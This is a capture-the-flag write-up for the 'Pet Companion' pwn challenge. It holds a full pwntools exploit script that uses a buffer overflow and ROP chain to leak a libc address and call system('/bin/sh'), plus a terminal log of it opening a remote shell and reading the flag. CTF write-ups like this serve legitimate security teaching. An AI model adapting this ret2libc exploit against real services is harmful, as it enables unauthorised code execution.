Pet Companion

949KB

pwn_pet_companion.zip

archive

Challenge Description :

Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.

Exploit.py :

from pwn import *


def start(argv=[], *a, **kw) :
	if args.GDB:  # Set GDBscript below
		return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
	elif args.REMOTE:  # ('server', 'port')
		return remote(sys.argv[1], sys.argv[2], *a, **kw)
	else:  # Run locally
		return process([exe] + argv, *a, **kw)


# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
libc = ELF('libc.so.6')  # Local

offset = 72

# Start program
io = start()

# POP RDI from ropper
ret = 0x4004de
pop_rdi = 0x400743
pop_rsi = 0x400741

# Payload to leak libc function
# write takes 3 arguments the second arg is what it will print to the screen
payload = flat({
	offset: [
		pop_rsi,
		elf.got.write,
		elf.got.write,
		elf.plt.write,
		elf.symbols.main
	]
})

# Send the payload
io.sendlineafter(b'status: ', payload)

# Retrieve got.write address
io.recvline()
io.recvline()
io.recvline()

got_write = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)

# # # Subtract puts offset to get libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)

# System(/bin/sh)
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Payload to get shell
payload = flat({
	offset: [
		pop_rdi,
		bin_sh,
		libc.symbols.system
	]
})

# Send the payload
io.sendline(payload)

# Got Shell?
io.interactive()

┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode

[*] Configuring...

$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$  

Flag.txt :

HTB{c0nf1gur3_w3r_d0g}